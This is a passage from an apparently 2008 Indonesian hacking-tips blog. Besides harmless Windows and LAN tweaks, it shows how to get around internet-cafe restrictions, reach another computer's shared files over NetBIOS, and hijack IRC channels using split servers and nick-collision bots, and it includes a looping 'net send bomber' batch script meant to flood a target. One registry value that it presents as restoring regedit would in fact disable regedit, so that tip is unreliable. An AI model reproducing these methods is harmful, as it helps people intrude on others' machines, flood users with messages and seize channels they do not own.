UWIE_LUMUT_BEKTI_CASEV_VISANTS_CLUBEIGHTIES

TRICK DI WARNET AGAINST WINDWS

2008-06-09T04:52:00.000-07:00

*Pernahkah suatu saat anda berkunjung ke "cyber cafe" a.k.a warnet
dan anda merasa kerepotan dengan berbagai 'restrict' yang diberlakukan
+disini aku sedikit coba mengulas, apa saja yang dapat anda lakukan
jika anda berada di posisi pemakai dan yang harus anda perhatikan jika
anda berada pada posisi penyedia layanan RazzO .

-=PErlindungan Wind*ws explorer
pelarangan penggunaan key wind*ws dengan cara ekstrim banget ( yaitu
dengan mengeksekusi mati tombol tersebut Smile ) sehingga anda tidak dapat
melakukan , windows key + e (to open the explorer), ..
hal yang bisa anda lakukan adalah:
-klik-kanan start menu dan pilih explore

-=pelarangan penggunaan win# explorer anda.

-pilih mydocuments, yang akan menjadi jalan pembuka anda ke explorer
jika anda kerepotan karena kehilangan tree view di kiri anda, jangan
khawatir apalagi panik dan berteriak-teriak memanggil operator Razz, yang
perlu dan bisa anda lakukan adalah,
arahkan kursor keatas, pada bar atas, pilih view > kemudian Explorer bar
> folders :: apakah sudah nampak seperti explorer bagi anda.

-Kesalahan yang dilakukan oleh penyedia layanan ataupun kelemahan OS tsb
adalah dengan memanfaatkan kelebihan/ kel**han Micr*s**k Internet
Explorer anda , yaitu bukalah browser anda, ketikkan c:\ atau a:\ atau
apapun juga,
* dan saya pernah mengalami kejadian ini, qkqkqkqkqkqk
-pada win* explorer , anda tidak bisa mengakses drive a:\ tanpa password
dari admin a.k.a yang punya (they used another third parties program)
tetapi dengan menggunakan IE anda dapat mengaksesnya tanpa kesulitan Smile
atau bahkan tanpa ketahuan Razz

ps: ternyata win# explorer dan Mic# IE gak kompak Razz

-=apabila windows yang anda pakai tak bisa menampilkan run aku sering pakai run buat mempercepat menggunakan "notepad", "mspaint",
dan tentu saja "command" Razz >

yang kudu dilakukan;

-buka teks editor a.k.a notepad or wordpad, lalu ketik dan pastekan ini.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
"NoRun"=dword:00000000

-save sebagai echo.reg [or whatever asal ekstensionnya REG]
-double klik file tersebut , jawab dengan mengklik - yes
-restart pc, cukup dengan Ctrl+Alt+Del, jika keluar popup.pilih eXplorer
terus di endtask aja, wait bentar.. kalo ada popup lagi enDtask lagi Razz

=+cara termudah kalo regedit bisa dipakai kamu bisa memasukkannya dari
regedit, coba ketik C:\WINDOWS\regedit.exe di barnya eXplorer, ataupun
pada URL BARnya Internet EXplorer anda Razz maka akan keluar window baru
yang berisi regedit Razz Smile,

masuk ke
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer
buat dword baru dan masukkan NoRun dengan dword 00000000

-=kalo regeditnya juga diilangin,nangis aja deh ;p hehhehe, gak kok, kan
kamu bisa buat file diatas itu..
kalo gak munculin dulu regeditnya, caranya :

cara 1-4 sama kayak diatas (males ngetikinnya):
tapi yang dipaste beda Wink ;P

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
"DisableRegistryTools"=dword:00000001

[oke]==
kalo kamu mau repot tinggal buat aja programnya, yang cuma ngejalanin
sintax tersebut diatas dsb.. banyak dah toolsnya..!

EOF.

"segini dulu deh, semoga bermanfaat!, jangan dibuat yang aneh-aneh kalo
gak mau jadi aneh Razz"

REFERENSI a.k.a bacaan :
diinspirasi dari berbagai sumber yang dah lawas <*maaf, terlupakan> ,
thanks tuk penulis sebelumnya && percobaan pribadi

== TINGKATAN MASYARAKAT HACKER ==

2008-06-09T04:47:00.000-07:00

Beberapa bagian dari tulisan asli telah mengalami modifikasi
dan penyesuaian. Beberapa yang kurang tepat juga telah saya
hapus dan saya sesuaikan relatif terhadap pendapat saya
sendiri. Mohon maaf.

Pada dasarnya, setiap pelaku TI atau praktisi hacking itu
sendiri mendefenisikan konsep 'HACKING' yang berbeda.
Tidak tertutup kemungkinan untuk terjadi perbedaan pendapat
terhadap konsep yang di makhsud, namun cukup jadikan
perbedaan pendapat sebagai sebuah kekayaan pemikiran.

Dalam perjalanan menuju pendewasaan, perubahan pola pikir dan
kemampuan teknik, setiap manusia yang memasuki wilayah hacking akan
melewati beberapa tingkatan.

1. Si Dungu
Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan
ini dengan istilah dungu. Mereka hanya memiliki kemampuan teknis
komputer yang rendah dan mengenal hacking dari surat kabar, bahwa
hacker adalah seorang penjahat elektronik.
Bahkan beberapa diantara mereka juga menulis di surat kabar dalam
hal dan konsep yang sama.

2. Lamer
Lamer merupakan sebuah fenomenal awal remaja yang tertarik
mempelajari hacking. Mereka mempunyai kemampuan komputer standar
dan sedikit lebih banyak mendapat informasi.
Mereka mencoba mencari petunjuk serangan praktis. Baik dari e-zine
maupun melalui diskusi IRC (Chatting). Serangan dilakukan dengan
trojan, sebuah remote administration tool yang memberikan akses
terhadap mesin yang telah terinfeksi.
Lamer juga melakukan benyak hal-hal tidak berguna, seperti
tukar-menukar nomor kartu kredit, dan tukar-menukar password
website porno komersial.
Hacker yang kompeten, atau remaja yang berhasil lolos dari
'seleksi alam' akan melalui masa ini dengan begitu cepat memasuki
wilayah penuh keingintahuan.

3. Wannabe
Wannabe hacker menganggap hacking lebih sebagai philosophy, atau
seni kehidupan. Mereka mulai membaca teknik-teknik hacking dasar
dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih
serius. Wannabe telah menunjukkan antusiasnya dalam hacking dan
mulai meninggalkan dunia lamer yang penuh kebodohan.

4. Larva
Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah
disibukkan dengan berbagai pertanyaan bagaimana benda-benda
bekerja ? Bagaimana dunia bekerja. Larva adalah step terpenting
dalam pembentukan jati diri hacker. Mereka menemukan cara untuk
membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa
melakukan pengerusakan, karena mereka tahu, pengerusakan sistem
adalah cara termudah bagi mereka (sysadmin dan polisi) untuk
menangkap jejak sang larva.

5. Hacker
Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang
yang berjuang. Akhirnya tingkatan tertinggi dari budaya digital
telah dicapai. Sebuah dunia baru menanti. Dunia hacking !!

Sesunguhnya setiap orang tidak akan tau kapan pastinya ia menjadi
hacker. Sama halnya dengan anda tidak pernah tau pasti kapan anda
tertidur. Hal terpenting adalah terus belajar dan mengembangkan
pengetahuan. Saat anda beristirahat sejenak dan mengenang kembali
.. anda telah menjadi hacker.

Kemampuan spesial.

Hacker dalam tahap pendewasaannya akan mengalami spesialisasi
skil/kemampuan. Mereka akan dikenal sebagai:

1. Wizard
Yaitu seseorang yang memiliki pengetahuan yang begitu banyak
terhadap subyek tertentu.

2. Guru
Seseorang yang tau apapun tehadap subyek tertentu. Mereka
mengetahui fitur-fitur tak terdokumentasi. Trik-trik pengembangan,
dan teknik-teknik mengalahkan keterbatasan - limit -

Hacker sejati mengenal kebodohannya dan terus mengembangkan diri untuk
mengatasi semua kebodohannya. Dan dalam perjalanan itu alam mengadakan
seleksi, siapakah yang mampu bertahan ?

overclocking video nvidia

2008-06-09T04:45:00.001-07:00

pada jendela registry masuk ke menu
hkey_local_machine/software/nvidiacoporation/global/nvTweak.
klik kanan dan tambahkan dword baru yang bernama coolbits dan isi dengan nilai 7
lalu pada table nvidia analog display akan ada menu baru yaitu clock frekuensysetting.

Optimalkan jaringan LAN

2008-06-09T04:43:00.002-07:00

1. pasang proxy server seperti squid, disamping untuk menyimpan cache internet yang telah dibuka sehingga client tinggal mengupdate data yang perlu juga untuk mengontrol bandwith tiap client

2. tweaking network
- beberapa tweaking network yang bagus coba kunjungi
http://www.speedguide.net/downloads.php
- juga lihat post topik di forum ini http://www.familycode.phpbbweb.com/viewtopic.php?t=606&mforum=familycode

jika client km menggunakan winxp, ada component bawaan QoS Packet Scheduler yang berguna untuk mengontrol traffic network dan service supaya berjalan baik, sayangnya jika dengan setingan default akan memakan banwith 20% yang masuk, untuk mengoptimalkan lewat group policy
dari
start->run-> ketik gpedit.msc
muncul group policy window kemudian pilih

Local Computer Policy->Computer Configuration->Administrative Templates->network->QoS Packet Scheduler klik dua kali limit reserveable bandwith seting awal adalah not configure, ganti dengan seting enable maka muncul nilai default=20 gantilah dengan 0

3. hal hal yang kecil
antara kabel utp dan kabel listrik harus ada space minimal 10 cm interverensi gelombang listrik dapat menurunkan kwalitas jaringan

semoga membantu

NetBios Attack_BAGUS

2008-06-09T04:43:00.001-07:00

Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)
Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring

Dalam tulisan ini saya asumsikan anda menggunakan win 98
Sebelum kita mulai coba kita find nbtstat.exe
Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip

Langkah langkah exploitasi :)
1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter
2. Click Start-->Run-->tulis nbtstat lalu OK

Kira kira mucul sperti ini :
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying statistics.

Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe

Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :
-A
-a

misal kita mau mencoba komputer dengan names belog.wasantara.net.id
maka kita gunakan :
nbtstat -a belog.wasantara.net.id

misal kita mau mencoba komputer dengan ip 192.168.1.1
maka kita gunakan :
nbtstat -A 192.168.1.1

Dari perintah diatas kemungkinan yang muncul adalah :
1. Host not found
2. Dan pesan indah seperti dibawah ini :

--------------------------------------------

NetBIOS Local Name Table

Name Type Status
---------------------------------------------
BELOG <00> UNIQUE Registered
POLOS <00> GROUP Registered
BELOG <03> UNIQUE Registered
BELOG <20> UNIQUE Registered
POLOS <1E> GROUP Registered

---------------------------------------------

Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)

Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.
Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena anggak 20 ini adalah informasi file dan printer sharing.

Apa langkah kita selanjutnya ?
Setelah kita mempunyai info diatas, cari file yang bernama :
LMHOST atau HOST (win 9x)

Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :
192.168.1.1 BELOG

Kemudian simpan.

Selanjutnya
Click Start-->Find-->Computer
masukan nama atau ipnya

Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)

Selamat :)
nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing

Net send bomber dengan batch programing

2008-06-09T04:42:00.000-07:00

Sebelumnya mohon maaf jika ada kata2 yg kurang berkenan (terutama untuk mas2 senior yg ada di balihack), penulis hanya ingin sharing sedikit ilmu untuk net send bomber(hanya bisa untuk intranet) dengan menggunakan batch programing.

Baiklah kita mulai dengan script kecil dibawah ini ,
--------------------------------------------------------------------------
@echo IP target : %1
@echo Net Send Bomber siap melakukan serangan ...
@pause
:serang
@net send %1 Hooiiiii %1 Jomblo_Keparat was here !!!!!!
@goto serang
--------------------------------------------------------------------------
simpan dengan nama serang.bat , terus cara menggunakannya di cmd DOS prompt ketik : serang [IP_TARGET]/[nama_komputer_target].
Contoh : serang 192.168.100.1
serang pc_target
serang * (bom ke semua PC yg ada di network)

untuk mengetahui IP target/nama komputer gunakan net view terlebih dahulu.
OK.terima kasih

cara nembak komputer dalam jaringan LAN

2008-06-09T04:41:00.001-07:00

== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==

BEGIN

*PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada
yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Menyembunyikan semua item pada desktop

2008-06-09T04:39:00.000-07:00

Setting berikut akan menyembunyikan semua item yang terdapat pada desktop Anda.

Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer
Value Name : NoDesktop
Data Type : DWORD Value
Data : (0 = disabled, 1 = enabled)

Menyembunyikan icon Network Neighborhood

2008-06-09T04:36:00.002-07:00

Icon Network Neigborhood akan nampak pada desktop jika Anda menginstall Windows Networking. Jika Anda tidak suka, Anda bisa menyembunyikan icon tersebut.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoNetHood
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled/menyembunyikan icon)

Menyembunyikan drive pada My Computer

2008-06-09T04:36:00.001-07:00

Anda bisa menyembunyikan drive pada My Computer dengan cara masuk ke :
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name : NoDrives
Data Type : DWORD Value
Data :
Pada data bisa Anda isi dengan drive yang ingin Anda sembunyikan. Adapun nilainya adalah :
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

Menjalankan Program Saat Memulai Windows (using registry)

2008-06-09T04:35:00.000-07:00

Untuk menjalankan program saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan
fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.
Misalnya kita akan menjalankan Notepad saat mulai Windows, caranya dengan menggunakan tip
berikut ini.
· Buka Registry dengan Regedit
· Buka key [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
· Pilih Edit | New | String Value, dan beri nama dengan Notepad
· Isi valuenya dengan 'C:\Windows\Notepad.exe'
· Restart PC

-----^v^-----

Menjalankan Program Berbasis Windows Dari Command Prompt

2008-06-09T04:34:00.001-07:00

========================================================

========================================================

why do we have to hold democracy ?
democracy is just a business.
who holds money, he holds democracy......

once upon a time, there is one cop and 100 bad guys
a cop wants to arrest all 100 bad guys
the bad guys said "this is democracy"
and the cop cannot arrest them ...

That's democracy that value truth based on majority
And I believe no democracy

Ternyata kita dapat menjalankan program - program berbasis Windows dari MS DOS prompt. Caranya
yaitu dengan mengetikkan nama programnya beserta path-nya. Untuk program - program yang
merupakan bawaan dari Windows itu sendiri, pembaca cukup menuliskan namannya saja.
Contohnya, untuk menjalankan Explorer, ikuti cara berikut :
1. ketik "explorer" pada MS Dos prompt,
2. kemudian tekan ENTER.
3. atau dengan menggunakan perintah Start sebelum nama program yang akan kita jalankan,
seperti "start explorer".
Untuk menjalankan program favorit pembaca, ketikkan pada command prompt adalah :
"c:\windows\myapp.exe", atau "start c:\windows\myapp.exe", bila saja program favorit pembaca
berada di direktori c:\windows dan bernama myapp.exe.

Perintah "start" dapat juga disertakan option berikut ini :
/m menjalankan program dengan di minimized
/max menjalankan program dengan di maximized
/r menjalankan program dengan di restored (default)

contoh :
ketikkan pada command prompt "start /max explorer".

Pembaca dapat juga menampilkan direktori yang sedang aktif melalui MS Dos prompt sehingga
akan tampil pada Windows Explorer direktori yang sedang aktif. Caranya dengan mengetikkan
"Start ." kemudian tekan Enter.

-----^v^-----

Menjadi Bangsat Beneran di IRC

2008-06-09T04:32:00.002-07:00

Tujuan dari artikel ini adalah untuk menyediakan apa yang menurut saya
adalah metodologi paling optimal dalam menge-hack channel IRC. Sebagai
Tambahan, akan disediakan pula beberapa channel yang lebih enak di-hack
dan juga aktivitas-aktivitas menarik yang dapat dilakukan jika kamu
berhasil mengambil alih kekuasaan dalam sebuah channel (0wn1ng).

1. Mengapa nge-hack IRC???

Sudah berkali-kali saya tanyakan kepada diri saya sendiri pertanyaan ini
dan jawaban-jawabannya ada banyak dan bervariasi. Salah satu dari alasan
utama mengehack channel IRC adalah berasal daari kemaha-bosanan. Biar
bagaimanapun, banyak alasan-alasan lain yang ada. Yang paling sering di-
dengar adalah "itu tuh, si op sialan itu ngeledek dan nge-'kick' gue,
dan gue ingin PEMBALASAN!!!". Ini adalah alasan yang cukup bisa diterima
dan kebosanan bukanlah satu satunya alasan yang diperlukan untuk meng-
takeover sebuah channel IRC. Tidak jadi masalah pula jika sebenernya
*KAMU* lah yang sialan dan mengacau sepanjang hari di channel tsb.
Segala yang kamu perlukan adalah keinginan, sedikit kemampuan, dan tentu
saja 'perangkat' yang tepat.

2. Perangkat yang tepat

Segala tukang memerlukan perkakas yang bisa diandalkan dan hacker-hacker
IRC tidaklah terkecuali. Tanpa peralatan ini kamu nggak akan bisa berbu-
at apapun. Semua perangkat yang kamu perlukan bisa didownload dari site
ftp umum. Sebelum saya lanjutkan ke diskusi mengenai apa yang akan kamu
perlukan, adalah penting untuk diketahui bahwa jika kamu membaca dokumen
ini dengan menggunakan account slip/ppp, mungkin ada baiknya kamu usa-
hakan mendapat account shell jika kamu serius mengenai masalah hacking.
(Baca artikel 'UNIX Shell dalam 24 Jam' oleh LithErr di Edisi lalu).
Mungkin banyak yang tidak setuju, tapi menurut pengalaman saya, mIRC a-
taupun program-program skrip IRC lainnya untuk PC tidaklah bisa menan-
dingi kecepatan dan kemudahan dari IRC 'shell script'. Jadi jelaslah
program pertama yang kita perlukan adalah IRC shell script yang sempurna.
Jika kamu bisa koneksi ke IRC melalui account shell kamu, artinya kamu
sudah punya script yang bisa dipakai. Sedangkan untuk yang masih ingin
mencoba hal baru, IRC script favorit saya adalah LICE - bisa didapat da-
ri site ftp umum. Skrip-skrip lain tersedia secara luas, namun kedahsyatan
command-command LICE tidaklah ada duanya. Nah, walaupun sekarang sudah
mungkin kamu berhenti membaca dokumen ini dan mulai menge-hack ops dengan
menggunakan hanya satu skrip, akan masih sangat susah bagi kamu jika kamu
tidak menggunakan alat-alat bantu sampingan. Saya menyarankan dua program
berikut:
1) Multi-Collide-Bot (MCB) dan 2) Link Looker (LL)
Kedua program C diatas adalah prajurit dan spion kamu. Sekali lagi, kedua-
nya tersedia secara umum melalui ftp dan keduanya perlu dikompilasi.

3. Apa yang diperlukan untuk mengambil alih kontrol
Dalam rangka meng-takeover sebuah channel secara efektif, kamu perlu men-
jadi satu-satunya pengguna dengan tanda @ didepan nama kamu. Jika kamu
berhasil melakukan hal ini, maka channel tersebut adalah MILIK KAMU!
Tentu saja, ini adalah sampai status tersebut direbut kembali atau sampai
kamu merasa cape menge-hack channel tsb. Ada banyak cara efektif untuk
mengambil alih kekuasaan di sebuah channel, dan saya akan mulai dengan
yang lebih sederhana.
Dari segala metode, cara yang paling sederhana untuk mendapat op adalah
dengan meminta secara langsung. Anda tertawa, heh? Jelas, seiring dengan
pertumbuhan hackers di IRC, metode meminta ini semakin sukar dilakukan.
Ini terjadi khususnya pada channel-channel yang cukup besar dan cukup
mapan sehingga punya semacam 'kultur' sendiri, seperti #netsex, #teensex,
#windows95, #bawel, #BDSM, #blaklife, #texas, #hack, dan channel-channel
#warez bersaudara. Tentu saja kamu tidak membaca artikel ini hanya untuk
diajari caranya meminta ops. Selain meminta, cara yang cukup efektif ada-
lah dengan memanfaatkan 'split'.
Apa yang dimaksud dengan 'split'? Sebuah 'split' terjadi ketika IRC server
tempat kamu berada memisahkan diri dari internet. Jika kamu ada di sebuah
channel dan tiba-tiba server kamu 'split' dan kamu adalah satu-satunya dari
channel tersebut yang terpisah, kamu akan menjadi sendiri dalam sebuah
channel, dan untuk mendapatkan ops, kamu cukup /leave dan re /join. Dan kamu
bisa melihat bahwa sekarang kamu mempunyai tanda @ didepan nick kamu. Ketika
server irc yang split tadi kembali menghubungkan diri ke net, sekarang kamu
sudah menjadi op. Sekarang kamupun berkata, "Wah, itu sih gampang sekali."
Salah. Yang paling sering terjadi (terutama) di channel-channel besar, banyak
yang akan men-deop kamu, dan merebut kembali status op kamu. Juga, lebih
penting lagi, jika kamu hanya mengandalkan 'luck' dengan cara masuk ke sebuah
channel dan menunggu server kamu untuk 'split' bisa bisa kamu mati duluan
menungguin server split. Lalu apa yang bisa dilakukan oleh sang wannabe IRC
hacker? Link Looker adalah jawabannya.

4. Link Looker
Link looker adalah program kecil yang bertindak sebagai agen spy kamu.
Tanpa menjelaskan mekanisme program yang cukup kompleks, pada dasarnya apa
yang perlu kamu ketahui adalah kegunaan program ini adalah untuk mengetahui
jika ada server IRC yang 'split'. Setiap kali sebuah server memisahkan diri,
LL akan mengidentifikasi server ini dan memberitahukan kamu mengenai hal
ini. LL juga akan memberitahukan kamu ketika sang server kembali bergabung.
Apakah metode ini semakin jelas, sekarang? Ya. Betul sekali. Ketika LL mem-
beritahukan kamu bahwa sebuah server sedang 'split', kamu segera connect
ke server tersebut dan /join channel yang kamu inginkan, dan berharaplah
bahwa tidak ada orang lain yang ikut-ikutan split di channel tsb (jika hal
ini terjadi, kamu nggak akan berhasil menjadi op). Cukup penting diingat
bahwa mengambil alih channel dengan cara menunggu split dan rejoin efektif
berlaku di channel-channel berukuran kecil sampai sedang, ataupun channel
yang tidak terorganisasi atau memanfaatkan 'bots' sebagai pelindung. Apa
yang perlu kamu lakukan adalah cukup dengan menunggu server split untuk re-
join kembali dan begitu kamu menjadi op di sebuah channel, luncurkan perin-
tah 'mass deop' (termasuk dalam skrip kamu dan merupakan kunci utama untuk
mem-'bersihkan' channel dari op-op lain). Dalam channel-channel yang lebih
besar dan lebih terorganisasi, biasanya cara diatas tidak akan bisa dilaku-
kan secara mudah dikarenakan hadirnya bot-bot penjaga dan juga skrip-skrip
'IRC Warrior' yang digunakan oleh para op beneran (manusia).

5. Bots dan Scripts
Channel channel yang lebih besar dan lebih terorganisasi, biasanya dijaga o-
leh bot-bot yang biasanya berfungsi untuk menjaga agar op tetap berfungsi di
pemilik op yang sah dengan cara kehadirannya yang berkesinambungan, dan juga
mempunyai kemampuan untuk mempertahankan channel dari serangan IRC hackers.
Ada banyak tipe dan jenis bot-bot ini, dan yang paling bagus biasanya juga
mempunyai kemampuan deopping 'splitters' seperti anda. Bukan hanya itu, bia-
sanya banyak pula human ops yang mempunyai skrip (seperti LICE) yang bisa
men-deop kamu secara otomatis. Nah, dengan semakin kompleksnya dunia IRC,
sebuah fenomena baru yang sering terjadi adalah 'desynch'. Hal ini adalah ke-
jadian cukup gila yang mengambil tempat saat kamu 'rejoin' dari 'split' dan
skrip kamu mendeop op-op asli sedangkan secara bersamaan skrip milik op-op
asli men-deop kamu. Yang akan terjadi adalah server-server yang terlibat akan
menjadi bingung dan akan memberi perintah desinkronisasi satu sama lain. Hal
ini perlu dihindari. Bagaimana caranya untuk mengambil alih channel yang di-
lindungi oleh skrip-skrip dan bot-bot? Tentu saja dengan menggunakan MCB!

6. Multi-Collide-Bot (MCB)
MCB adalah alat bantu yang berharga bagi kamu. MCB adalah juga sebuah program
cantik yang menciptakan sebuah 'clone' dari nick yang ingin kamu bunuh (nick
milik op-op lain di sebuah channel) di sebuah server yang sedang mengalami
'split' (ya, server yang ditemukan oleh Link Looker). Secara garis besar, kamu
